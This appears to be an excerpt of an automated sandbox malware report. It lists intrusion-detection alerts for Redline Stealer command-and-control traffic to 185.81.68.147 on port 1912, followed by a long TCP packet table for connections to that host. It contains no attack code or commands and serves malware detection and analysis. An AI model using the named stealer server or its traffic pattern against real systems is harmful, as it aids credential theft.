                                                                                                                                                                                                                      2024-12-17T10:15:12.247937+01002046056ET MALWARE Redline Stealer/MetaStealer Family Activity (Response)1185.81.68.1471912192.168.2.849710TCP
                                                                                                                                                                                                                      2024-12-17T10:15:12.671198+01002043231ET MALWARE Redline Stealer TCP CnC Activity1192.168.2.849710185.81.68.1471912TCP
                                                                                                                                                                                                                      2024-12-17T10:15:14.250236+01002043231ET MALWARE Redline Stealer TCP CnC Activity1192.168.2.849710185.81.68.1471912TCP
                                                                                                                                                                                                                      2024-12-17T10:15:14.814311+01002043231ET MALWARE Redline Stealer TCP CnC Activity1192.168.2.849710185.81.68.1471912TCP
                                                                                                                                                                                                                      2024-12-17T10:15:15.314297+01002043231ET MALWARE Redline Stealer TCP CnC Activity1192.168.2.849710185.81.68.1471912TCP
                                                                                                                                                                                                                      2024-12-17T10:15:16.035094+01002043231ET MALWARE Redline Stealer TCP CnC Activity1192.168.2.849710185.81.68.1471912TCP
                                                                                                                                                                                                                      2024-12-17T10:15:16.503808+01002043231ET MALWARE Redline Stealer TCP CnC Activity1192.168.2.849710185.81.68.1471912TCP
                                                                                                                                                                                                                      2024-12-17T10:15:16.984893+01002043231ET MALWARE Redline Stealer TCP CnC Activity1192.168.2.849710185.81.68.1471912TCP
                                                                                                                                                                                                                      2024-12-17T10:15:17.437884+01002043231ET MALWARE Redline Stealer TCP CnC Activity1192.168.2.849710185.81.68.1471912TCP
                                                                                                                                                                                                                      2024-12-17T10:15:18.066653+01002043231ET MALWARE Redline Stealer TCP CnC Activity1192.168.2.849710185.81.68.1471912TCP
                                                                                                                                                                                                                      2024-12-17T10:15:18.084242+01002043231ET MALWARE Redline Stealer TCP CnC Activity1192.168.2.849710185.81.68.1471912TCP
                                                                                                                                                                                                                      2024-12-17T10:15:18.532245+01002043231ET MALWARE Redline Stealer TCP CnC Activity1192.168.2.849710185.81.68.1471912TCP
                                                                                                                                                                                                                      2024-12-17T10:15:18.973784+01002043231ET MALWARE Redline Stealer TCP CnC Activity1192.168.2.849710185.81.68.1471912TCP
                                                                                                                                                                                                                      2024-12-17T10:15:19.415304+01002043231ET MALWARE Redline Stealer TCP CnC Activity1192.168.2.849710185.81.68.1471912TCP
                                                                                                                                                                                                                      2024-12-17T10:15:19.851257+01002043231ET MALWARE Redline Stealer TCP CnC Activity1192.168.2.849710185.81.68.1471912TCP
                                                                                                                                                                                                                      2024-12-17T10:15:20.336637+01002043231ET MALWARE Redline Stealer TCP CnC Activity1192.168.2.849710185.81.68.1471912TCP
                                                                                                                                                                                                                      2024-12-17T10:15:20.799615+01002043231ET MALWARE Redline Stealer TCP CnC Activity1192.168.2.849710185.81.68.1471912TCP
                                                                                                                                                                                                                      2024-12-17T10:15:21.240256+01002043231ET MALWARE Redline Stealer TCP CnC Activity1192.168.2.849710185.81.68.1471912TCP
                                                                                                                                                                                                                      2024-12-17T10:15:22.794899+01002043231ET MALWARE Redline Stealer TCP CnC Activity1192.168.2.849710185.81.68.1471912TCP
                                                                                                                                                                                                                      2024-12-17T10:15:23.245593+01002043231ET MALWARE Redline Stealer TCP CnC Activity1192.168.2.849710185.81.68.1471912TCP
                                                                                                                                                                                                                      2024-12-17T10:15:23.685906+01002043231ET MALWARE Redline Stealer TCP CnC Activity1192.168.2.849710185.81.68.1471912TCP
                                                                                                                                                                                                                      2024-12-17T10:15:24.159621+01002043231ET MALWARE Redline Stealer TCP CnC Activity1192.168.2.849710185.81.68.1471912TCP

                                                                                                                                                                                                                      Network Port Distribution

                                                                                                                                                                                                                      TCP Packets

                                                                                                                                                                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                      Dec 17, 2024 10:14:55.791253090 CET4970580192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:14:55.911102057 CET8049705185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:14:55.911159992 CET4970580192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:14:55.911230087 CET4970580192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:14:56.031459093 CET8049705185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:14:57.238166094 CET8049705185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:14:57.238420963 CET8049705185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:14:57.238471031 CET4970580192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:14:57.246510983 CET4970580192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:14:57.246925116 CET4970680192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:14:57.367916107 CET8049705185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:14:57.368388891 CET8049706185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:14:57.368506908 CET4970680192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:14:57.368565083 CET4970680192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:14:57.488548994 CET8049706185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:14:57.488604069 CET4970680192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:14:57.608393908 CET8049706185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:14:58.920505047 CET8049706185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:14:58.920543909 CET8049706185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:14:58.920731068 CET4970680192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:14:58.924698114 CET4970680192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:14:58.925009966 CET4970780192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:14:59.046341896 CET8049706185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:14:59.046777010 CET8049707185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:14:59.048023939 CET4970780192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:14:59.048096895 CET4970780192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:14:59.168023109 CET8049707185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:14:59.168984890 CET4970780192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:14:59.288908958 CET8049707185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:00.656069994 CET8049707185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:00.656662941 CET8049707185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:00.656708002 CET4970780192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:00.657728910 CET4970780192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:00.658073902 CET4970880192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:00.778202057 CET8049707185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:00.778215885 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:00.778364897 CET4970880192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:00.778542995 CET4970880192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:00.900996923 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:02.108469009 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:02.108506918 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:02.108517885 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:02.108573914 CET4970880192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:02.108580112 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:02.108594894 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:02.108606100 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:02.108617067 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:02.108640909 CET4970880192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:02.108691931 CET4970880192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:02.108769894 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:02.108788967 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:02.108800888 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:02.108803988 CET4970880192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:02.108850002 CET4970880192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:02.228593111 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:02.228631973 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:02.228889942 CET4970880192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:02.233202934 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:02.233473063 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:02.233814955 CET4970880192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:02.300851107 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:02.300873995 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:02.301213026 CET4970880192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:02.304965019 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:02.305043936 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:02.305097103 CET4970880192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:02.313553095 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:02.313672066 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:02.313786983 CET4970880192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:02.321783066 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:02.321876049 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:02.322213888 CET4970880192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:02.330254078 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:02.330430031 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:02.330854893 CET4970880192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:02.338707924 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:02.338841915 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:02.338886023 CET4970880192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:02.347126007 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:02.347151041 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:02.347223043 CET4970880192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:02.355519056 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:02.355654001 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:02.355986118 CET4970880192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:02.363974094 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:02.364062071 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:02.364155054 CET4970880192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:02.372440100 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:02.372536898 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:02.372622967 CET4970880192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:02.380373955 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:02.380431890 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:02.380558014 CET4970880192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:02.388319969 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:02.388361931 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:02.388510942 CET4970880192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:02.492928028 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:02.492957115 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:02.493030071 CET4970880192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:02.495165110 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:02.495301962 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:02.495356083 CET4970880192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:02.499986887 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:02.500010967 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:02.500123024 CET4970880192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:02.504651070 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:02.504857063 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:02.504982948 CET4970880192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:02.509452105 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:02.509469986 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:02.509536028 CET4970880192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:02.514103889 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:02.514209032 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:02.514888048 CET4970880192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:02.518811941 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:02.518893957 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:02.518958092 CET4970880192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:02.523370028 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:02.523471117 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:02.523514986 CET4970880192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:02.527872086 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:02.527981997 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:02.528095007 CET4970880192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:02.532454014 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:02.532510042 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:02.532557964 CET4970880192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:02.536931038 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:02.537074089 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:02.537122011 CET4970880192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:02.541645050 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:02.541856050 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:02.541939020 CET4970880192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:02.546056032 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:02.546099901 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:02.546468019 CET4970880192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:02.550570965 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:02.550654888 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:02.550875902 CET4970880192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:02.555079937 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:02.555166006 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:02.555598021 CET4970880192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:02.559588909 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:02.559623957 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:02.559691906 CET4970880192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:02.564122915 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:02.564229012 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:02.564495087 CET4970880192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:02.568702936 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:02.568850994 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:02.568906069 CET4970880192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:02.685105085 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:02.685224056 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:02.685731888 CET4970880192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:02.687175035 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:02.687330961 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:02.687490940 CET4970880192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:02.690640926 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:02.690834999 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:02.690881968 CET4970880192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:02.694224119 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:02.694328070 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:02.695838928 CET4970880192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:02.697798967 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:02.697887897 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:02.699209929 CET4970880192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:02.701400042 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:02.701483965 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:02.701567888 CET4970880192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:02.704866886 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:02.704955101 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:02.705070019 CET4970880192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:02.708456993 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:02.708470106 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:02.708632946 CET4970880192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:02.711950064 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:02.712199926 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:02.712645054 CET4970880192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:02.715333939 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:02.715459108 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:02.716238976 CET4970880192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:02.718882084 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:02.718941927 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:02.720880985 CET4970880192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:02.722392082 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:02.722491026 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:02.725169897 CET4970880192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:02.725847006 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:02.725996971 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:02.728537083 CET4970880192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:02.729319096 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:02.729455948 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:02.730422020 CET4970880192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:02.732904911 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:02.733027935 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:02.733181953 CET4970880192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:02.736399889 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:02.736504078 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:02.736792088 CET4970880192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:02.740200043 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:02.740257978 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:02.740765095 CET4970880192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:02.743702888 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:02.743748903 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:02.743874073 CET4970880192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:02.746898890 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:02.746990919 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:02.747065067 CET4970880192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:02.750400066 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:02.750471115 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:02.750536919 CET4970880192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:02.753918886 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:02.754009008 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:02.754441023 CET4970880192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:02.757390022 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:02.757505894 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:02.757693052 CET4970880192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:02.760967016 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:02.761147976 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:02.761456966 CET4970880192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:02.764417887 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:02.764561892 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:02.766037941 CET4970880192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:02.767919064 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:02.768029928 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:02.768342972 CET4970880192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:02.771409035 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:02.771605015 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:02.774306059 CET4970880192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:02.774930000 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:02.775002003 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:02.777018070 CET4970880192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:02.778440952 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:02.778573036 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:02.781953096 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:02.782059908 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:02.783370972 CET4970880192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:02.785482883 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:02.785542965 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:02.785717010 CET4970880192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:02.785717010 CET4970880192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:02.789299011 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:02.789377928 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:02.789450884 CET4970880192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:02.792577982 CET8049708185.81.68.147192.168.2.8
